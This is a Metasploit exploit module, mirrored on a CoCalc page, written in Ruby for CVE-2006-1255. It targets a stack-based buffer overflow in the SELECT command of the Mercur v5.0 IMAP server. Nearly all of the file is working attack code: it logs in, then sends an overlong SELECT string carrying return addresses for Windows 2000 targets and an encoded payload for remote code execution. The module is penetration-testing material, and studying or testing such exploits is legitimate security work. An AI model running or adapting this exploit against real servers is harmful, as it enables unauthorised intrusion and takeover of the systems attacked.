Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Imap
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
16
'Description' => %q{
17
Mercur v5.0 IMAP server is prone to a remotely exploitable
18
stack-based buffer overflow vulnerability. This issue is due
19
to a failure of the application to properly bounds check
20
user-supplied data prior to copying it to a fixed size memory buffer.
21
Credit to Tim Taylor for discover the vulnerability.
22
},
23
'Author' => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],
24
'License' => BSD_LICENSE,
25
'References' => [
26
[ 'CVE', '2006-1255' ],
27
[ 'OSVDB', '23950' ],
28
[ 'BID', '17138' ],
29
],
30
'Privileged' => true,
31
'DefaultOptions' => {
32
'EXITFUNC' => 'process',
33
},
34
'Payload' => {
35
'Space' => 400,
36
'BadChars' => "\x00",
37
'StackAdjustment' => -3500,
38
39
},
40
'Platform' => 'win',
41
'Targets' => [
42
['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
43
['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }],
44
],
45
'DefaultTarget' => 0,
46
'DisclosureDate' => '2006-03-17',
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
end
55
56
def exploit
57
sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
58
sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
59
sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
60
sploit << payload.encoded + rand_text_alpha_upper(453)
61
62
info = connect_login
63
64
if (info == true)
65
print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
66
sock.put(sploit + "\r\n")
67
else
68
print_status("Not falling through with exploit")
69
end
70
71
handler
72
disconnect
73
end
74
end
75
76